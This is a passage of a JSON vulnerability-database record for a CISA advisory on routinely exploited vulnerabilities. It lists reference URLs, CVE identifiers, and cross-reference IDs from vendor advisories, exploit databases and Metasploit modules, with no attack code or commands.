"https://www.us-cert.gov/ncas/alerts/aa19-339a", "https://nvd.nist.gov/vuln/detail/CVE-2012-0158", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133i", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133j", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133k", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133l", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133n", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133o", "https://nvd.nist.gov/vuln/detail/CVE-2019-0604", "https://nvd.nist.gov/vuln/detail/CVE-2017-0143", "https://nvd.nist.gov/vuln/detail/CVE-2018-4878", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133d", "https://nvd.nist.gov/vuln/detail/CVE-2017-8759", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133f", "https://nvd.nist.gov/vuln/detail/CVE-2015-1641", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133m", "https://nvd.nist.gov/vuln/detail/CVE-2018-7600", "https://www.us-cert.gov/ncas/alerts/aa20-107a", "https://nvd.nist.gov/vuln/detail/CVE-2019-11510", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://www.us-cert.gov/ncas/alerts/aa20-020a", "https://www.us-cert.gov/ncas/alerts/aa20-031a", "https://www.fireeye.com/blog/products-and-services/2020/01/fireeye-and-citrix-tool-scans-for-iocs-related-to-vulnerability.html", "https://nvd.nist.gov/vuln/detail/CVE-2019-19781", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://www.us-cert.gov/ncas/alerts/aa20-120a", "https://www.cisa.gov/cyber-essentials", "https://www.us-cert.gov/ncas/alerts/aa20-120a", "https://www.cisa.gov/cyber-essentials", "https://www.fbi.gov/contact-us/field", "https://cve.mitre.org/cve/", "https://www.us-cert.gov/ncas/alerts/TA15-119A", "https://www.recordedfuture.com/top-vulnerabilities-2019/", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a", "https://www.facebook.com/CISA", "https://twitter.com/CISAgov", "https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency", "https://www.youtube.com/@cisagov", "https://www.instagram.com/cisagov", "https://www.dhs.gov/accessibility", "https://www.dhs.gov/performance-financial-reports", "https://www.dhs.gov", "https://www.dhs.gov/foia", "https://www.oig.dhs.gov/", "https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138", "https://www.whitehouse.gov/", "https://www.usa.gov/"], "cvelist": ["CVE-2012-0158", "CVE-2015-1641", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-8759", "CVE-2018-4878", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "immutableFields": [], "lastseen": "2023-09-23T07:41:19", "viewCount": 7, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "adobe", "idList": ["APSA18-01", "APSB18-03"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2018-7600"]}, {"type": "archlinux", "idList": ["ASA-201804-1"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "BAM-18242", "CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:0B98F2DD-5956-40B0-B275-66C7E7BB4D2D", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:0FA0C973-1E4C-48B7-BA36-DBE63803563D", "AKB:12F253E0-F6F2-4628-A989-57A36E8C7026", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:41DF47B0-8F5D-477F-9F42-AB76A33252AD", "AKB:4DF5EF01-8CC5-4A65-87F7-E627FAA3F022", "AKB:66FA01AC-CBAA-4917-AF21-8896B661A3F4", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:6CA719CE-A47A-414E-8DBA-FFE14F20C0FF", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:9977C74D-CDF9-4992-9D78-89CEEEAEA23A", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:B7C679E9-6ECB-4663-BF1E-330295E69CC4", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F05BE8C2-C144-45BE-BF46-5867A2CAAF15", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:7E0DF6DEBB35FB55F6B4D33A7262A422", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS12_027", "MS17_010", "NETSCALER_TRAVERSAL_RCE", "OFFICE_WSDL", "STRUTS_OGNL"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D", "CARBONBLACK:B16171F3AA4A3A162027FA8750C9D202", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "cert", "idList": ["VU:101048", "VU:421280", "VU:619785", "VU:834067", "VU:921560", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-129", "CPAI-2012-130", "CPAI-2012-131", "CPAI-2012-132", "CPAI-2012-133", "CPAI-2014-1384", "CPAI-2015-0444", "CPAI-2017-0177", "CPAI-2017-0197", "CPAI-2017-0251", "CPAI-2017-0676", "CPAI-2017-0750", "CPAI-2017-1009", "CPAI-2018-0052", "CPAI-2018-0192", "CPAI-2018-1697", "CPAI-2019-0392", "CPAI-2019-1097", "CPAI-2019-1653"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:8809AF4B96861275A43448FB64E686D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2012-0158", "CISA-KEV-CVE-2015-1641", "CISA-KEV-CVE-2017-0143", "CISA-KEV-CVE-2017-0199", "CISA-KEV-CVE-2017-11882", "CISA-KEV-CVE-2017-5638", "CISA-KEV-CVE-2017-8759", "CISA-KEV-CVE-2018-4878", "CISA-KEV-CVE-2018-7600", "CISA-KEV-CVE-2019-0604", "CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2022-42475", "CISA-KEV-CVE-2022-47966"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cnvd", "idList": ["CNVD-2022-87170"]}, {"type": "cve", "idList": ["CVE-2012-0158", "CVE-2015-1641", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-11884", "CVE-2017-5638", "CVE-2017-8759", "CVE-2018-4878", "CVE-2018-7600", "CVE-2019-0594", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1325-1:426F0", "DEBIAN:DLA-1325-1:E895C", "DEBIAN:DSA-4156-1:C1814", "DEBIAN:DSA-4156-1:CE193"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-638", "E-639", "E-688"]}, {"type": "exploitdb", "idList": ["EDB-ID:41894", "EDB-ID:41934", "EDB-ID:42711", "EDB-ID:43163", "EDB-ID:44263", "EDB-ID:44412", "EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482", "EDB-ID:44744", "EDB-ID:44745", "EDB-ID:47297", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:1B366A9B404A79180DAB2A9C4AE015B0", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "EXPLOITPACK:3AE76F8EB91746556D3EB11E9FF64F66", "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "EXPLOITPACK:6891CF27FFF72B8EB68CEFB56D149FC3", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "EXPLOITPACK:BF5C8288A392CBC3E7947C012FB8E11E", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:D16BF29892ADBD1FE8B1E6E0A3DED407", "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB", "EXPLOITPACK:E563140BD918794B55F61FC55941120F"]}, {"type": "f5", "idList": ["F5:K22854260", "F5:K43451236", "F5:K57181937"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:3F234602D69C", "FEDORA:45D79604B015", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:C2CB46042D4E", "FEDORA:D89B16076A01"]}, {"type": "fireeye", "idList": ["FIREEYE:0D4F2E1284C786ABA6A50D8BE7E34E6E", "FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:2648D8DF405C49929956ACCF89B47ABF", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:338F0E4516B790140B04DBFA18EAAC20", "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:38120E3D3979DCD57297419690545DDD", "FIREEYE:3A68F8390FB41E5497C5AA3B9BEBA5A6", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:4B85E44D28C8512270923B36728CBD59", "FIREEYE:622FA05F62A3EDD3379557F635579EFB", "FIREEYE:6590BB51C6F8AABFD43517A1C445F65D", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:840F71EB7FEBB100F9428F0841BEF2CF", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "FIREEYE:92F27B3F6B5FC8C7C22B088678232819", "FIREEYE:9503F430A48297769A46076960747B2F", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "FIREEYE:F3E71742D8E5D617D6B77A2DB930882F", "FIREEYE:F58154E35F166E87B591935191A7EA69"]}, {"type": "fortinet", "idList": ["FG-IR-22-398"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31", "756A8631-0B84-11E8-A986-6451062F0F7A", "A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "gentoo", "idList": ["GLSA-201803-08"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989", "GITHUB:0519EA92487B44F364A1B35C85049455", "GITHUB:C82C4FE9D1A6B81D79D6EF10C4F9D007"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "059DC199-E425-50EE-B5F5-E351E0323E69", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A03C474-5159-5D12-82D2-E28FA42B84BB", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "2A80D982-2C57-5BA2-86CB-6169F3859086", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "31DB22CD-3492-524F-9D26-035FC1086A71", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "38A11E23-686C-5C12-93FA-4A82D0E04202", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3AFE745D-D706-5B84-B2C7-205590936BBF", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "58F1E19B-12E9-5FE1-90C6-14688FEE3C8C", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "637FA72A-45F0-5611-85EB-A28965CFDB93", "6787DC40-24C2-5626-B213-399038EFB0E9", "721C46F4-C390-5D23-B358-3D4B22959428", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "77A82210-BA24-58B5-8539-C0177DA9E1FB", "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "90DEDA40-245E-56EA-A2AF-D7D36E62AF50", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A4F881D3-85FA-580E-9465-AA77CE5B7390", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B2FBA40E-C397-5DC8-8BF4-FA5BCB824172", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C0A0F6D6-A203-5F8D-819A-40B5B23B0223", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D93AD4F3-228E-5F05-A21F-9D852E25F569", "DC044D23-6D59-5326-AB78-94633F024A74", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "FC802471-7CE1-5444-80E9-9DB49BA530DD"]}, {"type": "hackerone", "idList": ["H1:1063256", "H1:212022", "H1:212985", "H1:213069", "H1:534630", "H1:536134", "H1:591295", "H1:617543", "H1:671749", "H1:671857", "H1:678496", "H1:680480", "H1:695005"]}, {"type": "hivepro", "idList": ["HIVEPRO:0B8823CF2C319136EC74B1EBBD7D38BE", "HIVEPRO:3D8952D1ED1ADBF8196A73CD3B7344F2", "HIVEPRO:6B816A83F1272E907442906CCA28A809", "HIVEPRO:8B19BED13F2445F04B8CD896B9AE4959", "HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F", "HIVEPRO:A2447429328461A02AB00335C0BB3EC2", "HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675", "HIVEPRO:E73184FF060DA7208BAF888A5AF221EF"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2", "HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "ibm", "idList": ["02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "02D84FEF44D33E0AEFACF9F0F69D208CD35169CED383AB4155C383F596F12961", "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5"]}, {"type": "ics", "idList": ["AA18-284A", "AA18-337A", "AA19-024A", "AA19-122A", "AA19-168A", "AA19-290A", "AA19-339A", "AA20-006A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-049A", "AA20-073A", "AA20-099A", "AA20-106A", "AA20-107A", "AA20-120A", "AA20-126A", "AA20-182A", "AA20-183A", "AA20-195A", "AA20-198A", "AA20-205A", "AA20-206A", "AA20-209A", "AA20-225A", "AA20-227A", "AA20-239A", "AA20-245A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-275A", "AA20-280A", "AA20-283A", "AA20-296A", "AA20-296B", "AA20-301A", "AA20-302A", "AA20-304A", "AA20-336A", "AA20-345A", "AA20-352A", "AA21-0000A", "AA21-008A", "AA21-042A", "AA21-048A", "AA21-055A", "AA21-062A", "AA21-076A", "AA21-077A", "AA21-110A", "AA21-116A", "AA21-131A", "AA21-148A", "AA21-200A", "AA21-200B", "AA21-201A", "AA21-209A", "AA21-229A", "AA21-243A", "AA21-259A", "AA21-287A", "AA21-291A", "AA21-321A", "AA21-336A", "AA21-356A", "AA22-011A", "AA22-040A", "AA22-047A", "AA22-054A", "AA22-055A", "AA22-057A", "AA22-074A", "AA22-076A", "AA22-083A", "AA22-103A", "AA22-108A", "AA22-110A", "AA22-117A", "AA22-131A", "AA22-137A", "AA22-138A", "AA22-138B", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-181A", "AA22-187A", "AA22-216A", "AA22-223A", "AA22-228A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-279A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-059A", "AA23-061A", "AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A", "AA23-158A", "AA23-165A", "AA23-187A", "AA23-193A", "AA23-201A", "AA23-208A", "AA23-213A", "AA23-215A", "AA23-242A", "AA23-250A", "AA23-263A", "ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "IMPERVABLOG:E3068E5C16504E4E7591776B5E79213F"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA10995", "KLA11024", "KLA11059", "KLA11101", "KLA11139", "KLA11191", "KLA11417", "KLA11835", "KLA11902"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4421457840699592233", "KITPLOIT:4611207874033525364", "KITPLOIT:4707889613618662864", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:5494076556436489947", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:DF8493DA16F49CE6247436830678BA8D", "KREBS:E2D2D085D282D0D49FB14A33098B68DE", "KREBS:EE70929DE902D9B233E209B73C1AD4A0", "KREBS:F0163956314C713411403F8497E4F9A4"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2018-0120"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:026284ECC22DB2D1F343F9B66686DEF9", "MALWAREBYTES:06D9BFC6DC339FACFCE028EB1C5A79EF", "MALWAREBYTES:16440CAA6CF5418D984950D297C8549D", "MALWAREBYTES:197219DC341BA8DE850FF6435F75C3A4", "MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:1EF2E06811A91F2948F835D21FF698ED", "MALWAREBYTES:21860B5266FF4C6017A8B388973F2911", "MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "MALWAREBYTES:29082210E17AE80B08D8FF58AED79F23", "MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3350250AEB75AAF452630CE0B7306455", "MALWAREBYTES:3A629D0DB6CE0BFDB2462C4612ED19ED", "MALWAREBYTES:4232991FEE4DC3F0CD04D068FBB82A1C", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:6C5219B55CB625F7D9D16F7CD92E526C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C", "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A", "MALWAREBYTES:B3C57DCB817E8FCEC5860BC0C22D5A2A", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:C8D6FFC9442802684305F89A89609938", "MALWAREBYTES:C982F670DC06D05621493C9E9A1E0E14", "MALWAREBYTES:CA0A032ADCA72FCB979CB83795FC527B", "MALWAREBYTES:CCB1B1B23474798BB372D709A6E97F86", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:DA40246EC094218998CD2BD24735C7A6", "MALWAREBYTES:E0E596B13A84774F12BFB5962B091DCE", "MALWAREBYTES:EA93E4D6EB6BD6A0F2388E0DF2AE2D16", "MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46", "MALWAREBYTES:F79B9F46F986F9BDA455EEBF8E2CA464", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_SERVICEDESK_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_WORD_HTA-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ENDPOINT_CENTRAL_SAML_RCE_CVE_2022_47966-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:30A997667BFA925FD541E3DCB1F1DEB6", "MMPC:4C62BE50213C7726C383DAD096CBBB99", "MMPC:69455AB621A495CAB62392B8DB0987B3", "MMPC:6B8C3A836431A67926F568B51D67E59F", "MMPC:C13F25080AC9B1B34AF77630B988E9E8", "MMPC:D3341B3E36680D5272BC91A3694352AC", "MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:ADV180004", "MS:CVE-2017-0143", "MS:CVE-2017-0199", "MS:CVE-2017-11882", "MS:CVE-2017-8759", "MS:CVE-2019-0604"]}, {"type": "mskb", "idList": ["KB2553204", "KB2664258", "KB3048019", "KB3141529", "KB3141538", "KB3162047", "KB3178703", "KB3178710", "KB4011262", "KB4011276", "KB4011604", "KB4011618", "KB4013389", "KB4014793", "KB4038781", "KB4038782", "KB4038783", "KB4038788", "KB4040955", "KB4040956", "KB4040957", "KB4040958", "KB4040959", "KB4040960", "KB4040964", "KB4040965", "KB4040966", "KB4040967", "KB4040971", "KB4040972", "KB4040973", "KB4040974", "KB4040975", "KB4040977", "KB4040978", "KB4040979", "KB4040980", "KB4040981", "KB4041083", "KB4041084", "KB4041085", "KB4041086", "KB4041090", "KB4041091", "KB4041092", "KB4041093", "KB4461630", "KB4462143", "KB4462155", "KB4462171", "KB4462184", "KB4462199", "KB4462202", "KB4462211"]}, {"type": "msrc", "idList": ["MSRC:2EBC1615B24AC4821703C4F7C38CE463"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:30A997667BFA925FD541E3DCB1F1DEB6", "MSSECURE:4C62BE50213C7726C383DAD096CBBB99", "MSSECURE:7D81C7477636B6DB964C5D3E62D605D5", "MSSECURE:8D599A5B631D1251230D906E6D71C774", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:A60AFC5A5E991E303E0397289A086789", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D3341B3E36680D5272BC91A3694352AC", 